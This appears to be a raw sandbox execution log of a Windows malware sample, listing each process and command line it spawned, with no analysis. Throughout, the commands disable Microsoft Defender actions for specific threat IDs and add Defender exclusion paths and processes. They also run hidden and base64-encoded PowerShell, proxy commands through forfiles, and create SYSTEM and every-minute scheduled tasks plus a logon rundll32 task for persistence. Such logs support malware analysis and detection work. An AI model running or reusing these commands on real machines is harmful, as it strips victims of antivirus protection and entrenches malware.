C:\Windows\SysWOW64\cmd.exe
/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
\??\c:\windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
C:\Windows\SysWOW64\cmd.exe
/C powershell start-process -WindowStyle Hidden gpupdate.exe /force
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell start-process -WindowStyle Hidden gpupdate.exe /force
C:\Users\Admin\AppData\Local\Temp\service123.exe
C:\Users\Admin\AppData\Local\Temp\/service123.exe
C:\Windows\SysWOW64\gpupdate.exe
"C:\Windows\system32\gpupdate.exe" /force
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:64;"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:64
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\1000308001\freedom.exe'
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\FDxSmxakU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\FDxSmxakU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\HIJHyLDMFVIrArjMcDR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\HIJHyLDMFVIrArjMcDR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\QSBDBQxFkAUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\QSBDBQxFkAUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\TjUkTRKCSiJkC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\TjUkTRKCSiJkC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\tEZYwqVfuQYU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\tEZYwqVfuQYU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\IrAQtycGxHJKWAVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\IrAQtycGxHJKWAVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\XYiMwitzkSXbvcQKY\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\XYiMwitzkSXbvcQKY\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\BhywXhhbcuWpvQvH\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\BhywXhhbcuWpvQvH\" /t REG_DWORD /d 0 /reg:64;"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\FDxSmxakU" /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\FDxSmxakU" /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\FDxSmxakU" /t REG_DWORD /d 0 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\HIJHyLDMFVIrArjMcDR" /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\HIJHyLDMFVIrArjMcDR" /t REG_DWORD /d 0 /reg:64
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'freedom.exe'
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\QSBDBQxFkAUn" /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\QSBDBQxFkAUn" /t REG_DWORD /d 0 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\TjUkTRKCSiJkC" /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\TjUkTRKCSiJkC" /t REG_DWORD /d 0 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\tEZYwqVfuQYU2" /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\tEZYwqVfuQYU2" /t REG_DWORD /d 0 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\IrAQtycGxHJKWAVB /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\IrAQtycGxHJKWAVB /t REG_DWORD /d 0 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\Windows.exe'
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\XYiMwitzkSXbvcQKY /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\XYiMwitzkSXbvcQKY /t REG_DWORD /d 0 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\BhywXhhbcuWpvQvH /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\BhywXhhbcuWpvQvH /t REG_DWORD /d 0 /reg:64
C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "gdbNRRfPn" /SC once /ST 00:07:41 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
C:\Windows\SysWOW64\schtasks.exe
schtasks /run /I /tn "gdbNRRfPn"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Windows.exe'
C:\Windows\system32\gpupdate.exe
"C:\Windows\system32\gpupdate.exe" /force
\??\c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s fhsvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
\??\c:\windows\system32\gpscript.exe
gpscript.exe /RefreshSystemParam
C:\Windows\System32\schtasks.exe
"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Windows" /tr "C:\Users\Admin\Windows.exe"
C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "gdbNRRfPn"
C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "hzhNAJUNSjjdIpELG" /SC once /ST 00:04:20 /RU "SYSTEM" /TR "\"C:\Windows\Temp\BhywXhhbcuWpvQvH\imJuHYElqEyLwtg\dVAPrcg.exe\" AX /ZHOydidKV 385107 /S" /V1 /F
C:\Windows\SysWOW64\schtasks.exe
schtasks /run /I /tn "hzhNAJUNSjjdIpELG"
C:\Windows\Temp\BhywXhhbcuWpvQvH\imJuHYElqEyLwtg\dVAPrcg.exe
C:\Windows\Temp\BhywXhhbcuWpvQvH\imJuHYElqEyLwtg\dVAPrcg.exe AX /ZHOydidKV 385107 /S
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2972 -s 936
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
C:\Windows\SysWOW64\cmd.exe
/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
\??\c:\windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
C:\Windows\SysWOW64\cmd.exe
/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
\??\c:\windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
C:\Windows\SysWOW64\cmd.exe
/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
\??\c:\windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
C:\Windows\SysWOW64\cmd.exe
/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
\??\c:\windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
C:\Windows\SysWOW64\cmd.exe
/C powershell start-process -WindowStyle Hidden gpupdate.exe /force
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell start-process -WindowStyle Hidden gpupdate.exe /force
C:\Windows\SysWOW64\gpupdate.exe
"C:\Windows\system32\gpupdate.exe" /force
C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "bOYLEOfZCACcRQIJvG"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True" &
C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\FDxSmxakU\NbuCkm.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "FnGigHNXGPuYnow" /V1 /F
C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True"
C:\Windows\SysWOW64\cmd.exe
